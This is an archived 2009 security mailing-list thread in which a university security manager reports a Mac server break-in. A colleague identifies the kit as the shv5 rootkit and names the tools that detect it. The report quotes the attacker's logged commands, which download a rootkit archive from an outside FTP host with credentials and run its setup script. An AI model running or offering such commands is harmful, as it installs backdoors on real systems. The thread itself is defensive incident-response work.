[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347

Joel Rosenblatt joel at columbia.edu
Mon Mar 30 15:18:10 EDT 2009 

Thanks Donald.

Our standard fix is nuke and pave .. I meant removed from the machine serving it :-)

Regards,
Joel

--On Monday, March 30, 2009 12:49 PM -0600 "Smith, Donald" <Donald.Smith at qwest.com> wrote:

> That is shv5 a unix root kit. They may have updated it to complile on macs but its been around for years.
> It can be removed.
> Rootkit hunter can detect it. http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
> chkrootkit also finds it. http://www.chkrootkit.org
>
> Primarily it puts up a back door ssh and trojans several binaries.
>
>
>
>
> Security through obscurity WORKS against some worms and ssh attacks:)
> Donald.Smith at qwest.com gcia
>
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net
>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
>> Joel Rosenblatt
>> Sent: Monday, March 30, 2009 12:01 PM
>> To: nsp-security at puck.nether.net
>> Subject: [nsp-sec] MAC root kit found on www.funmangames.com
>> 208.113.230.135- ASN 26347
>>
>> ----------- nsp-security Confidential --------
>>
>> Hi,
>>
>> We had a break in of a Mac server (bad root password .. duh)
>> - upon going through the log of commands run, we came across
>>
>> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
>>
>> tar xzf kit5.tar
>>
>> ls -a
>>
>> cd shv5
>>
>> ./setup abelha 54
>>
>> It appears to be a Mac root kit.
>>
>> AS      | IP               | AS Name
>> 26347   | 208.113.230.135  | DREAMHOST-AS - New Dream Network, LLC
>>
>> I wonder if it could be removed.
>>
>> Thanks,
>> Joel Rosenblatt
>>
>> Joel Rosenblatt, Manager Network & Computer Security
>> Columbia Information Security Office (CISO)
>> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
>> http://www.columbia.edu/~joel
>>
>>
>>
>> _______________________________________________
>> nsp-security mailing list
>> nsp-security at puck.nether.net
>> https://puck.nether.net/mailman/listinfo/nsp-security
>>
>> Please do not Forward, CC, or BCC this E-mail outside of the
>> nsp-security
>> community. Confidentiality is essential for effective
>> Internet security counter-measures.
>> _______________________________________________
>>
>>



Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office (CISO)
Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
http://www.columbia.edu/~joel

More information about the nsp-security mailing list